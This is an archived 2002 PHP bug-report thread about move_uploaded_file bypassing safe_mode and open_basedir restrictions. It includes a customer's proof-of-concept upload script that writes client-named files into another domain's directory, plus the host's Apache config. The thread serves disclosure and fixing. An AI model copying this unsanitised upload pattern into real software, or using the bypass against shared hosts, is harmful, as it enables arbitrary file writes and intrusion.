Bug #16128 Updated: move_uploaded_file breaks safe_mode and open_basedir restrictions
| From: | wouter at widexs dot nl | Date: | Mon, 18 Mar 2002 19:18:10 +0000 |
| Subject: | Bug #16128 Updated: move_uploaded_file breaks safe_mode and open_basedir restrictions | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-2786@lists.php.net to get a copy of this message | ||
ID: 16128
Updated by: wouter@widexs.nl
Reported By: tozz@embrace.selwerd.nl
Status: Closed
Bug Type: *General Issues
Operating System: Linux 2.4.13
PHP Version: 4.1.2
New Comment:
In CVS it's fixed _if_ you use open_basedir. But if you don't, the
php_checkuid fails to do it's work...
Previous Comments:
------------------------------------------------------------------------
[2002-03-17 16:03:34] sesser@php.net
This bug has been fixed in CVS.
------------------------------------------------------------------------
[2002-03-17 15:21:37] tozz@embrace.selwerd.nl
The script in this example is a bit crippled due to wordwrapping. Here
is the original script:
http://root.net-force.nl/prog.txt
------------------------------------------------------------------------
[2002-03-17 15:05:11] tozz@embrace.selwerd.nl
One of my customers has found a way to break my safe_mode and
open_basedir restrictions. (www.net-force.nl)
He created the following script:
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file){
if ($size < $size_limit){
move_uploaded_file($temp,
"/domains/killanet.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
As you can see, he moved the uploaded file to:
"/domains/killanet.org/public_html/www/test/"
Which should be impossible, because my httpd.conf says:
<VirtualHost 213.206.77.232>
DocumentRoot /domains/net-force.nl/public_html/root/
ServerName root.net-force.nl
CustomLog /domains/net-force.nl/logs/access_log combined
ErrorLog /domains/net-force.nl/logs/error_log
php_admin_value safe_mode 1
php_admin_value open_basedir /domains/net
force.nl/public_html/root/
</VirtualHost>
As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.
Credits fly out to bastijs@net-force.nl for finding this bug.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=16128&edit=1